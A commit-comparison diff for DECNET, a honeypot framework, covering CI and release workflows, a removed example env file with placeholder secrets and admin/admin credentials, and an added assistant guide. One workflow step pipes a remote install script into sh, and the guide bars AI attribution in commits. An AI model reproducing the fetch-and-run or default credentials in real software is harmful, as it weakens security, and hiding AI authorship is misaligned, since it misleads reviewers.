Compare commits
3 Commits
89268f19fb
...
v0.1.0
| Author | SHA1 | Date | |
|---|---|---|---|
| 897f498bcd | |||
| 92e06cb193 | |||
| 7ad7e1e53b |
12
.env.example
12
.env.example
@@ -1,12 +0,0 @@
|
||||
# API Options
|
||||
DECNET_API_HOST=0.0.0.0
|
||||
DECNET_API_PORT=8000
|
||||
DECNET_JWT_SECRET=supersecretkey12345678901234567
|
||||
DECNET_INGEST_LOG_FILE=/var/log/decnet/decnet.log
|
||||
|
||||
# Web Dashboard Options
|
||||
DECNET_WEB_HOST=0.0.0.0
|
||||
DECNET_WEB_PORT=8080
|
||||
DECNET_ADMIN_USER=admin
|
||||
DECNET_ADMIN_PASSWORD=admin
|
||||
DECNET_DEVELOPER=False
|
||||
@@ -2,10 +2,7 @@ name: CI
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [dev, testing, "temp/merge-*"]
|
||||
paths-ignore:
|
||||
- "**/*.md"
|
||||
- "docs/**"
|
||||
branches: [dev, testing]
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
@@ -17,7 +14,21 @@ jobs:
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install ruff
|
||||
- run: ruff check decnet/
|
||||
- run: ruff check .
|
||||
|
||||
test:
|
||||
name: Test (pytest)
|
||||
runs-on: ubuntu-latest
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["3.11", "3.12"]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .
|
||||
- run: pytest tests/ -v --tb=short
|
||||
|
||||
bandit:
|
||||
name: SAST (bandit)
|
||||
@@ -28,7 +39,7 @@ jobs:
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install bandit
|
||||
- run: bandit -r decnet/ -ll -x decnet/services/registry.py -x decnet/templates/
|
||||
- run: bandit -r decnet/ -ll -x decnet/services/registry.py
|
||||
|
||||
pip-audit:
|
||||
name: Dependency audit (pip-audit)
|
||||
@@ -39,120 +50,37 @@ jobs:
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install pip-audit
|
||||
- run: pip install -e .[dev]
|
||||
- run: pip-audit --skip-editable --ignore-vuln CVE-2025-65896 --ignore-vuln CVE-2026-3219
|
||||
- run: pip install -e .
|
||||
- run: pip-audit --skip-editable
|
||||
|
||||
test-standard:
|
||||
name: Test (Standard)
|
||||
open-pr:
|
||||
name: Open PR to main
|
||||
runs-on: ubuntu-latest
|
||||
needs: [lint, bandit, pip-audit]
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["3.11"]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .[dev]
|
||||
- run: pytest
|
||||
|
||||
test-live:
|
||||
name: Test (Live)
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard]
|
||||
services:
|
||||
mysql:
|
||||
image: mysql:8.0
|
||||
env:
|
||||
MYSQL_ROOT_PASSWORD: root
|
||||
MYSQL_DATABASE: decnet_test
|
||||
ports:
|
||||
- 3307:3306
|
||||
options: >-
|
||||
--health-cmd="mysqladmin ping -h 127.0.0.1"
|
||||
--health-interval=10s
|
||||
--health-timeout=5s
|
||||
--health-retries=5
|
||||
strategy:
|
||||
matrix:
|
||||
python-version: ["3.11"]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .[dev]
|
||||
- run: pytest -m live
|
||||
env:
|
||||
DECNET_MYSQL_HOST: 127.0.0.1
|
||||
DECNET_MYSQL_PORT: 3307
|
||||
DECNET_MYSQL_USER: root
|
||||
DECNET_MYSQL_PASSWORD: root
|
||||
DECNET_MYSQL_DATABASE: decnet_test
|
||||
|
||||
merge-to-testing:
|
||||
name: Merge dev → testing
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard, test-live]
|
||||
needs: [lint, test, bandit, pip-audit]
|
||||
if: github.ref == 'refs/heads/dev'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
- name: Configure git
|
||||
- name: Open PR via Gitea API
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
- name: Merge dev into testing
|
||||
run: |
|
||||
git fetch origin testing
|
||||
git checkout testing
|
||||
git merge origin/dev --no-ff -m "ci: auto-merge dev → testing [skip ci]"
|
||||
git push origin testing
|
||||
|
||||
prepare-merge-to-main:
|
||||
name: Prepare Merge to Main
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard, test-live, test-fuzz]
|
||||
if: github.ref == 'refs/heads/testing'
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
- name: Configure git
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
- name: Create temp branch and sync with main
|
||||
run: |
|
||||
git fetch origin main
|
||||
git checkout -b temp/merge-testing-to-main
|
||||
echo "--- Switched to temp branch, merging main into it ---"
|
||||
git merge origin/main --no-edit || { echo "CONFLICT: Manual resolution required"; exit 1; }
|
||||
git push origin temp/merge-testing-to-main --force
|
||||
|
||||
finalize-merge-to-main:
|
||||
name: Finalize Merge to Main
|
||||
runs-on: ubuntu-latest
|
||||
needs: [test-standard, test-live, test-fuzz]
|
||||
if: startsWith(github.ref, 'refs/heads/temp/merge-')
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
- name: Configure git
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
- name: Merge RC into main
|
||||
run: |
|
||||
git fetch origin main
|
||||
git checkout main
|
||||
git merge ${{ github.ref }} --no-ff -m "ci: auto-merge testing → main"
|
||||
git push origin main
|
||||
echo "--- Cleaning up temp branch ---"
|
||||
git push origin --delete ${{ github.ref_name }}
|
||||
echo "--- Checking for existing open PRs ---"
|
||||
LIST_RESPONSE=$(curl -s \
|
||||
-H "Authorization: token ${{ secrets.DECNET_PR_TOKEN }}" \
|
||||
"https://git.resacachile.cl/api/v1/repos/anti/DECNET/pulls?state=open&head=anti:dev&base=main&limit=5")
|
||||
echo "$LIST_RESPONSE"
|
||||
EXISTING=$(echo "$LIST_RESPONSE" | python3 -c "import sys, json; print(len(json.load(sys.stdin)))")
|
||||
echo "Open PRs found: $EXISTING"
|
||||
if [ "$EXISTING" -gt "0" ]; then
|
||||
echo "PR already open, skipping."
|
||||
exit 0
|
||||
fi
|
||||
echo "--- Creating PR ---"
|
||||
CREATE_RESPONSE=$(curl -s -X POST \
|
||||
-H "Authorization: token ${{ secrets.DECNET_PR_TOKEN }}" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"title": "Auto PR: dev → main",
|
||||
"head": "dev",
|
||||
"base": "main",
|
||||
"body": "All CI and security checks passed. Review and merge when ready."
|
||||
}' \
|
||||
"https://git.resacachile.cl/api/v1/repos/anti/DECNET/pulls")
|
||||
echo "$CREATE_RESPONSE"
|
||||
|
||||
@@ -3,9 +3,6 @@ name: PR Gate
|
||||
on:
|
||||
pull_request:
|
||||
branches: [main]
|
||||
paths-ignore:
|
||||
- "**/*.md"
|
||||
- "docs/**"
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
@@ -30,28 +27,5 @@ jobs:
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- run: pip install -e .[dev]
|
||||
- run: pip install -e .
|
||||
- run: pytest tests/ -v --tb=short
|
||||
|
||||
bandit:
|
||||
name: SAST (bandit)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install bandit
|
||||
- run: bandit -r decnet/ -ll -x decnet/services/registry.py
|
||||
|
||||
pip-audit:
|
||||
name: Dependency audit (pip-audit)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-python@v5
|
||||
with:
|
||||
python-version: "3.11"
|
||||
- run: pip install pip-audit
|
||||
- run: pip install -e .[dev]
|
||||
- run: pip-audit --skip-editable
|
||||
|
||||
@@ -3,9 +3,6 @@ name: Release
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
paths-ignore:
|
||||
- "**/*.md"
|
||||
- "docs/**"
|
||||
|
||||
env:
|
||||
REGISTRY: git.resacachile.cl
|
||||
@@ -22,42 +19,27 @@ jobs:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.DECNET_PR_TOKEN }}
|
||||
|
||||
- name: Configure git
|
||||
run: |
|
||||
git config user.name "DECNET CI"
|
||||
git config user.email "ci@decnet.local"
|
||||
|
||||
- name: Bump version and Tag
|
||||
- name: Extract version from pyproject.toml
|
||||
id: version
|
||||
run: |
|
||||
# Calculate next version (v0.x)
|
||||
LATEST_TAG=$(git describe --tags --abbrev=0 2>/dev/null || echo "v0.0.0")
|
||||
NEXT_VER=$(python3 -c "
|
||||
tag = '$LATEST_TAG'.lstrip('v')
|
||||
parts = tag.split('.')
|
||||
major = int(parts[0]) if parts[0] else 0
|
||||
minor = int(parts[1]) if len(parts) > 1 else 0
|
||||
print(f'{major}.{minor + 1}.0')
|
||||
")
|
||||
|
||||
echo "Next version: $NEXT_VER (calculated from $LATEST_TAG)"
|
||||
|
||||
# Update pyproject.toml
|
||||
sed -i "s/^version = \".*\"/version = \"$NEXT_VER\"/" pyproject.toml
|
||||
|
||||
git add pyproject.toml
|
||||
git commit -m "chore: auto-release v$NEXT_VER [skip ci]" || echo "No changes to commit"
|
||||
CHANGELOG=$(git log ${LATEST_TAG}..HEAD --oneline --no-decorate --no-merges)
|
||||
git tag -a "v$NEXT_VER" -m "Auto-release v$NEXT_VER
|
||||
VERSION=$(python3 -c "import tomllib; f=open('pyproject.toml','rb'); d=tomllib.load(f); print(d['project']['version'])")
|
||||
echo "version=$VERSION" >> $GITHUB_OUTPUT
|
||||
|
||||
Changes since $LATEST_TAG:
|
||||
$CHANGELOG"
|
||||
git push origin main --follow-tags
|
||||
|
||||
echo "version=$NEXT_VER" >> $GITHUB_OUTPUT
|
||||
echo "created=true" >> $GITHUB_OUTPUT
|
||||
- name: Create tag if not exists
|
||||
id: tag
|
||||
run: |
|
||||
VERSION=${{ steps.version.outputs.version }}
|
||||
if git rev-parse "v$VERSION" >/dev/null 2>&1; then
|
||||
echo "Tag v$VERSION already exists, skipping."
|
||||
echo "created=false" >> $GITHUB_OUTPUT
|
||||
else
|
||||
git config user.name "gitea-actions"
|
||||
git config user.email "actions@git.resacachile.cl"
|
||||
git tag -a "v$VERSION" -m "Release v$VERSION"
|
||||
git push origin "v$VERSION"
|
||||
echo "created=true" >> $GITHUB_OUTPUT
|
||||
fi
|
||||
|
||||
docker:
|
||||
name: Build, scan & push ${{ matrix.service }}
|
||||
@@ -67,7 +49,7 @@ $CHANGELOG"
|
||||
fail-fast: false
|
||||
matrix:
|
||||
service:
|
||||
- conpot
|
||||
- cowrie
|
||||
- docker_api
|
||||
- elasticsearch
|
||||
- ftp
|
||||
@@ -84,12 +66,11 @@ $CHANGELOG"
|
||||
- postgres
|
||||
- rdp
|
||||
- redis
|
||||
- real_ssh
|
||||
- sip
|
||||
- smb
|
||||
- smtp
|
||||
- snmp
|
||||
- ssh
|
||||
- telnet
|
||||
- tftp
|
||||
- vnc
|
||||
steps:
|
||||
@@ -115,13 +96,13 @@ $CHANGELOG"
|
||||
cache-from: type=gha
|
||||
cache-to: type=gha,mode=max
|
||||
|
||||
- name: Install Trivy
|
||||
run: |
|
||||
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
|
||||
|
||||
- name: Scan with Trivy
|
||||
run: |
|
||||
trivy image --exit-code 1 --severity CRITICAL --ignore-unfixed decnet-${{ matrix.service }}:scan
|
||||
uses: aquasecurity/trivy-action@master
|
||||
with:
|
||||
image-ref: decnet-${{ matrix.service }}:scan
|
||||
exit-code: "1"
|
||||
severity: CRITICAL
|
||||
ignore-unfixed: true
|
||||
|
||||
- name: Push image
|
||||
if: success()
|
||||
|
||||
39
.gitignore
vendored
39
.gitignore
vendored
@@ -1,10 +1,4 @@
|
||||
.venv/
|
||||
.venv*/
|
||||
.311/
|
||||
.3[0-9][0-9]/
|
||||
logs/
|
||||
.claude/*
|
||||
CLAUDE.md
|
||||
__pycache__/
|
||||
*.pyc
|
||||
*.pyo
|
||||
@@ -12,42 +6,13 @@ __pycache__/
|
||||
dist/
|
||||
build/
|
||||
decnet-compose.yml
|
||||
# Per-topology compose fragments emitted by `decnet topology deploy`.
|
||||
decnet-topology-*-compose.yml
|
||||
# Docker build context cache.
|
||||
.docker/
|
||||
decnet-state.json
|
||||
*.ini
|
||||
.env
|
||||
decnet.log*
|
||||
*.loggy
|
||||
*.nmap
|
||||
linterfails.log
|
||||
test-scan
|
||||
webmail
|
||||
windows1
|
||||
*.db
|
||||
*.db-shm
|
||||
*.db-wal
|
||||
decnet.*.log
|
||||
# Rotated copies (logrotate appends .1, .2, .gz...) — the existing
|
||||
# decnet.*.log glob doesn't catch the suffix.
|
||||
decnet.*.log.*
|
||||
decnet.json
|
||||
.env*
|
||||
.env.local
|
||||
.coverage
|
||||
.hypothesis/
|
||||
profiles/*
|
||||
tests/test_decnet.db*
|
||||
|
||||
# Nested git clone of the wiki — not a submodule, just a local
|
||||
# working copy so we can edit docs without a full round-trip.
|
||||
wiki-checkout/
|
||||
|
||||
# Scratch test/debug outputs that leak from saved `pytest > hang.log`
|
||||
# or `pytest > schem` redirections.
|
||||
hang.log
|
||||
schem
|
||||
*.pytest.log
|
||||
|
||||
# pydeps-style dependency graph dumps from local analysis runs.
|
||||
deps.txt
|
||||
|
||||
57
CLAUDE.md
Normal file
57
CLAUDE.md
Normal file
@@ -0,0 +1,57 @@
|
||||
# CLAUDE.md
|
||||
|
||||
This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.
|
||||
|
||||
## Commands
|
||||
|
||||
```bash
|
||||
# Install (dev)
|
||||
pip install -e .
|
||||
|
||||
# List registered service plugins
|
||||
decnet services
|
||||
|
||||
# Dry-run (generates compose, no containers)
|
||||
decnet deploy --mode unihost --deckies 3 --randomize-services --dry-run
|
||||
|
||||
# Full deploy (requires root for MACVLAN)
|
||||
sudo decnet deploy --mode unihost --deckies 5 --interface eth0 --randomize-services
|
||||
sudo decnet deploy --mode unihost --deckies 3 --services ssh,smb --log-target 192.168.1.5:5140
|
||||
|
||||
# Status / teardown
|
||||
decnet status
|
||||
sudo decnet teardown --all
|
||||
sudo decnet teardown --id decky-01
|
||||
```
|
||||
|
||||
## Project Overview
|
||||
|
||||
DECNET is a honeypot/deception network framework. It deploys fake machines (called **deckies**) with realistic services (RDP, SMB, SSH, FTP, etc.) to lure and profile attackers. All attacker interactions are aggregated to an isolated logging network (ELK stack / SIEM).
|
||||
|
||||
## Deployment Models
|
||||
|
||||
**UNIHOST** — one real host spins up _n_ deckies via a container orchestrator. Simpler, single-machine deployment.
|
||||
|
||||
**SWARM (MULTIHOST)** — _n_ real hosts each running deckies. Orchestrated via Ansible/sshpass or similar tooling.
|
||||
|
||||
## Core Technology Choices
|
||||
|
||||
- **Containers**: Docker Compose is the starting point but other orchestration frameworks should be evaluated if they serve the project better. `debian:bookworm-slim` is the default base image; mixing in Ubuntu, CentOS, or other distros is encouraged to make the decoy network look heterogeneous.
|
||||
- **Networking**: Deckies need to appear as real machines on the LAN (own MACs/IPs). MACVLAN and IPVLAN are candidates; the right driver depends on the host environment. WSL has known limitations — bare metal or a VM is preferred for testing.
|
||||
- **Log pipeline**: Logstash → ELK stack → SIEM (isolated network, not reachable from decoy network)
|
||||
|
||||
## Architecture Constraints
|
||||
|
||||
- The decoy network must be reachable from the outside (attacker-facing).
|
||||
- The logging/aggregation network must be isolated from the decoy network.
|
||||
- A publicly accessible real server acts as the bridge between the two networks.
|
||||
- Deckies should differ in exposed services and OS fingerprints to appear as a heterogeneous network.
|
||||
|
||||
## Development and testing
|
||||
|
||||
- For every new feature, pytests must be made.
|
||||
- Pytest is the main testing framework in use.
|
||||
- NEVER pass broken code to the user.
|
||||
- Broken means: not running, not passing 100% of tests, etc.
|
||||
- After 100% of tests pass, always git commit your changes.
|
||||
- NEVER add "Co-Authored-By" or any Claude attribution lines to git commit messages.
|
||||
1
DEVELOPMENT.md
Normal file
1
DEVELOPMENT.md
Normal file
@@ -0,0 +1 @@
|
||||
CI/CD TEST 2
|
||||
674
LICENSE
674
LICENSE
@@ -1,674 +0,0 @@
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
TERMS AND CONDITIONS
|
||||
|
||||
0. Definitions.
|
||||
|
||||
"This License" refers to version 3 of the GNU General Public License.
|
||||
|
||||
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
"The Program" refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as "you". "Licensees" and
|
||||
"recipients" may be individuals or organizations.
|
||||
|
||||
To "modify" a work means to copy from or adapt all or part of the work
|
||||
in a fashion requiring copyright permission, other than the making of an
|
||||
exact copy. The resulting work is called a "modified version" of the
|
||||
earlier work or a work "based on" the earlier work.
|
||||
|
||||
A "covered work" means either the unmodified Program or a work based
|
||||
on the Program.
|
||||
|
||||
To "propagate" a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for
|
||||
infringement under applicable copyright law, except executing it on a
|
||||
computer or modifying a private copy. Propagation includes copying,
|
||||
distribution (with or without modification), making available to the
|
||||
public, and in some countries other activities as well.
|
||||
|
||||
To "convey" a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through
|
||||
a computer network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays "Appropriate Legal Notices"
|
||||
to the extent that it includes a convenient and prominently visible
|
||||
feature that (1) displays an appropriate copyright notice, and (2)
|
||||
tells the user that there is no warranty for the work (except to the
|
||||
extent that warranties are provided), that licensees may convey the
|
||||
work under this License, and how to view a copy of this License. If
|
||||
the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
1. Source Code.
|
||||
|
||||
The "source code" for a work means the preferred form of the work
|
||||
for making modifications to it. "Object code" means any non-source
|
||||
form of a work.
|
||||
|
||||
A "Standard Interface" means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of
|
||||
interfaces specified for a particular programming language, one that
|
||||
is widely used among developers working in that language.
|
||||
|
||||
The "System Libraries" of an executable work include anything, other
|
||||
than the work as a whole, that (a) is included in the normal form of
|
||||
packaging a Major Component, but which is not part of that Major
|
||||
Component, and (b) serves only to enable use of the work with that
|
||||
Major Component, or to implement a Standard Interface for which an
|
||||
implementation is available to the public in source code form. A
|
||||
"Major Component", in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system
|
||||
(if any) on which the executable work runs, or a compiler used to
|
||||
produce the work, or an object code interpreter used to run it.
|
||||
|
||||
The "Corresponding Source" for a work in object code form means all
|
||||
the source code needed to generate, install, and (for an executable
|
||||
work) run the object code and to modify the work, including scripts to
|
||||
control those activities. However, it does not include the work's
|
||||
System Libraries, or general-purpose tools or generally available free
|
||||
programs which are used unmodified in performing those activities but
|
||||
which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for
|
||||
the work, and the source code for shared libraries and dynamically
|
||||
linked subprograms that the work is specifically designed to require,
|
||||
such as by intimate data communication or control flow between those
|
||||
subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users
|
||||
can regenerate automatically from other parts of the Corresponding
|
||||
Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that
|
||||
same work.
|
||||
|
||||
2. Basic Permissions.
|
||||
|
||||
All rights granted under this License are granted for the term of
|
||||
copyright on the Program, and are irrevocable provided the stated
|
||||
conditions are met. This License explicitly affirms your unlimited
|
||||
permission to run the unmodified Program. The output from running a
|
||||
covered work is covered by this License only if the output, given its
|
||||
content, constitutes a covered work. This License acknowledges your
|
||||
rights of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not
|
||||
convey, without conditions so long as your license otherwise remains
|
||||
in force. You may convey covered works to others for the sole purpose
|
||||
of having them make modifications exclusively for you, or provide you
|
||||
with facilities for running those works, provided that you comply with
|
||||
the terms of this License in conveying all material for which you do
|
||||
not control copyright. Those thus making or running the covered works
|
||||
for you must do so exclusively on your behalf, under your direction
|
||||
and control, on terms that prohibit them from making any copies of
|
||||
your copyrighted material outside their relationship with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under
|
||||
the conditions stated below. Sublicensing is not allowed; section 10
|
||||
makes it unnecessary.
|
||||
|
||||
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||
|
||||
No covered work shall be deemed part of an effective technological
|
||||
measure under any applicable law fulfilling obligations under article
|
||||
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||
similar laws prohibiting or restricting circumvention of such
|
||||
measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid
|
||||
circumvention of technological measures to the extent such circumvention
|
||||
is effected by exercising rights under this License with respect to
|
||||
the covered work, and you disclaim any intention to limit operation or
|
||||
modification of the work as a means of enforcing, against the work's
|
||||
users, your or third parties' legal rights to forbid circumvention of
|
||||
technological measures.
|
||||
|
||||
4. Conveying Verbatim Copies.
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you
|
||||
receive it, in any medium, provided that you conspicuously and
|
||||
appropriately publish on each copy an appropriate copyright notice;
|
||||
keep intact all notices stating that this License and any
|
||||
non-permissive terms added in accord with section 7 apply to the code;
|
||||
keep intact all notices of the absence of any warranty; and give all
|
||||
recipients a copy of this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey,
|
||||
and you may offer support or warranty protection for a fee.
|
||||
|
||||
5. Conveying Modified Source Versions.
|
||||
|
||||
You may convey a work based on the Program, or the modifications to
|
||||
produce it from the Program, in the form of source code under the
|
||||
terms of section 4, provided that you also meet all of these conditions:
|
||||
|
||||
a) The work must carry prominent notices stating that you modified
|
||||
it, and giving a relevant date.
|
||||
|
||||
b) The work must carry prominent notices stating that it is
|
||||
released under this License and any conditions added under section
|
||||
7. This requirement modifies the requirement in section 4 to
|
||||
"keep intact all notices".
|
||||
|
||||
c) You must license the entire work, as a whole, under this
|
||||
License to anyone who comes into possession of a copy. This
|
||||
License will therefore apply, along with any applicable section 7
|
||||
additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no
|
||||
permission to license the work in any other way, but it does not
|
||||
invalidate such permission if you have separately received it.
|
||||
|
||||
d) If the work has interactive user interfaces, each must display
|
||||
Appropriate Legal Notices; however, if the Program has interactive
|
||||
interfaces that do not display Appropriate Legal Notices, your
|
||||
work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent
|
||||
works, which are not by their nature extensions of the covered work,
|
||||
and which are not combined with it such as to form a larger program,
|
||||
in or on a volume of a storage or distribution medium, is called an
|
||||
"aggregate" if the compilation and its resulting copyright are not
|
||||
used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work
|
||||
in an aggregate does not cause this License to apply to the other
|
||||
parts of the aggregate.
|
||||
|
||||
6. Conveying Non-Source Forms.
|
||||
|
||||
You may convey a covered work in object code form under the terms
|
||||
of sections 4 and 5, provided that you also convey the
|
||||
machine-readable Corresponding Source under the terms of this License,
|
||||
in one of these ways:
|
||||
|
||||
a) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by the
|
||||
Corresponding Source fixed on a durable physical medium
|
||||
customarily used for software interchange.
|
||||
|
||||
b) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by a
|
||||
written offer, valid for at least three years and valid for as
|
||||
long as you offer spare parts or customer support for that product
|
||||
model, to give anyone who possesses the object code either (1) a
|
||||
copy of the Corresponding Source for all the software in the
|
||||
product that is covered by this License, on a durable physical
|
||||
medium customarily used for software interchange, for a price no
|
||||
more than your reasonable cost of physically performing this
|
||||
conveying of source, or (2) access to copy the
|
||||
Corresponding Source from a network server at no charge.
|
||||
|
||||
c) Convey individual copies of the object code with a copy of the
|
||||
written offer to provide the Corresponding Source. This
|
||||
alternative is allowed only occasionally and noncommercially, and
|
||||
only if you received the object code with such an offer, in accord
|
||||
with subsection 6b.
|
||||
|
||||
d) Convey the object code by offering access from a designated
|
||||
place (gratis or for a charge), and offer equivalent access to the
|
||||
Corresponding Source in the same way through the same place at no
|
||||
further charge. You need not require recipients to copy the
|
||||
Corresponding Source along with the object code. If the place to
|
||||
copy the object code is a network server, the Corresponding Source
|
||||
may be on a different server (operated by you or a third party)
|
||||
that supports equivalent copying facilities, provided you maintain
|
||||
clear directions next to the object code saying where to find the
|
||||
Corresponding Source. Regardless of what server hosts the
|
||||
Corresponding Source, you remain obligated to ensure that it is
|
||||
available for as long as needed to satisfy these requirements.
|
||||
|
||||
e) Convey the object code using peer-to-peer transmission, provided
|
||||
you inform other peers where the object code and Corresponding
|
||||
Source of the work are being offered to the general public at no
|
||||
charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded
|
||||
from the Corresponding Source as a System Library, need not be
|
||||
included in conveying the object code work.
|
||||
|
||||
A "User Product" is either (1) a "consumer product", which means any
|
||||
tangible personal property which is normally used for personal, family,
|
||||
or household purposes, or (2) anything designed or sold for incorporation
|
||||
into a dwelling. In determining whether a product is a consumer product,
|
||||
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||
product received by a particular user, "normally used" refers to a
|
||||
typical or common use of that class of product, regardless of the status
|
||||
of the particular user or of the way in which the particular user
|
||||
actually uses, or expects or is expected to use, the product. A product
|
||||
is a consumer product regardless of whether the product has substantial
|
||||
commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
"Installation Information" for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install
|
||||
and execute modified versions of a covered work in that User Product from
|
||||
a modified version of its Corresponding Source. The information must
|
||||
suffice to ensure that the continued functioning of the modified object
|
||||
code is in no case prevented or interfered with solely because
|
||||
modification has been made.
|
||||
|
||||
